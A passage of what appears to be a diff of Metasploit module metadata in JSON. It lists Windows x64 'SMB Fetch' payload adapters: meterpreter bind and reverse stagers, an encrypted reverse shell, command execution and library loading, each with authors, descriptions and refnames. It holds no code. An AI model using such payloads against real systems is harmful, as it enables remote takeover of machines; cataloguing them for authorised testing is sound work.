winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/smb/x64/encrypted_shell/reverse_tcp": { - "name": "SMB Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": 
"payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/smb/x64/encrypted_shell_reverse_tcp": { - "name": "SMB Fetch, Windows Encrypted Reverse Shell", - "fullname": "payload/cmd/windows/smb/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/exec": { - "name": "SMB Fetch, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/smb/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/smb/x64/loadlibrary": { - "name": "SMB Fetch, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/smb/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "scriptjunkie", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/loadlibrary", - "check": 
false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/smb/x64/messagebox": { - "name": "SMB Fetch, Windows MessageBox x64", - "fullname": "payload/cmd/windows/smb/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "pasta " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": 
"windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_named_pipe": { - "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_tcp": { - "name": "SMB Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": 
"Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_tcp_rc4": { - "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - 
"stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/meterpreter/bind_tcp_uuid": { - "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_http": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_https": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": 
"windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_named_pipe": { - "name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp": { - "name": "SMB Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", - "references": [ - 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4": { - "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
"adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid": { - "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_winhttp": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 
payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/smb/x64/meterpreter/reverse_winhttps": { - "name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": 
{}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/smb/x64/meterpreter_bind_named_pipe": { - "name": "SMB Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_bind_tcp": { - "name": "SMB Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 
payload from an SMB server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_reverse_http": { - "name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_reverse_https": { - "name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp": { - "name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. 
